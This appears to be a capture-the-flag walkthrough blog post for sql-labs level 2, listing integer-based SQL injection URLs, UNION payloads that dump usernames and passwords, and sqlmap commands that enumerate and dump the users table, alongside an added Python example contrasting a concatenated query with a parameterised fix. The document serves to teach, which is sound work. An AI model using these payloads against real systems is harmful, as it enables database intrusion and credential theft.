[CTF Series] Sql-labs Level 02: GET - Error based - Integer based

Commands

Method 1: Manual injection

http://x.x.x.x:x/Less-2/?id=1
http://x.x.x.x:x/Less-2/?id=2

http://x.x.x.x:x/Less-2/?id=1 and 1=1
http://x.x.x.x:x/Less-2/?id=1 and 1=2

http://x.x.x.x:x/Less-2/?id=1 order by 1
http://x.x.x.x:x/Less-2/?id=1 order by 3
http://x.x.x.x:x/Less-2/?id=1 order by 4

http://x.x.x.x:x/Less-2/?id=-1 union select 1,2,3
http://x.x.x.x:x/Less-2/?id=-1 union select 1,2,database()
http://x.x.x.x:x/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables
http://x.x.x.x:x/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
http://x.x.x.x:x/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'
http://x.x.x.x:x/Less-2/?id=-1 union select 1,2,group_concat(username,0x3a,password) from users
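
Why the requests above behave as they do, and what the fix looks like, as an added example that is not part of the original post or of the lab's code. It assumes an in-memory SQLite table standing in for the lab's MySQL `users` table; the rows and the function names `lookup_vulnerable`, `lookup_hardened` and `compare` are constructed for illustration.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the lab's users table (SQLite, not MySQL)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "alice", "pw-one"), (2, "bob", "pw-two")])
    return db

def lookup_vulnerable(db, raw_id):
    # Integer context: the parameter is concatenated with no quotes around it,
    # so anything after the number is parsed as SQL.
    sql = "SELECT id, username, password FROM users WHERE id=" + raw_id + " LIMIT 1"
    return db.execute(sql).fetchall()

def lookup_hardened(db, raw_id):
    # 1) Validate the type: reject anything that is not a plain decimal integer.
    if not raw_id.isascii() or not raw_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    # 2) Bind the value: the driver passes it as data, never as SQL text.
    sql = "SELECT id, username, password FROM users WHERE id = ? LIMIT 1"
    return db.execute(sql, (int(raw_id),)).fetchall()

def compare(db, raw_id):
    """Return (vulnerable_result, hardened_result or 'rejected') for one input."""
    vuln = lookup_vulnerable(db, raw_id)
    try:
        hard = lookup_hardened(db, raw_id)
    except ValueError:
        hard = "rejected"
    return vuln, hard

if __name__ == "__main__":
    db = make_db()
    # Inputs taken from the requests listed on this page.
    for probe in ["1", "1 and 1=1", "1 and 1=2", "-1 union select 1,2,3"]:
        print(repr(probe), "->", compare(db, probe))
```

The differing results for `1 and 1=1` and `1 and 1=2` in the concatenated version are the signal that the parameter reaches the query as SQL; the hardened version rejects both before the database sees them.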

Method 2: sqlmap, same as Level 01

sqlmap -u http://x.x.x.x:x/Less-1/?id=1 --dbs
sqlmap -u http://x.x.x.x:x/Less-1/?id=1 -D security --tables
sqlmap -u http://x.x.x.x:x/Less-1/?id=1 -D security -T users --columns
sqlmap -u http://x.x.x.x:x/Less-1/?id=1 -D security -T users -C password,id,username --dump

http://example.com/2023/08/08/ctf/【ctf系列】Sql-labs 第02关:GET -Error based -Integer based/
Author: ningan123
Published: August 8, 2023
License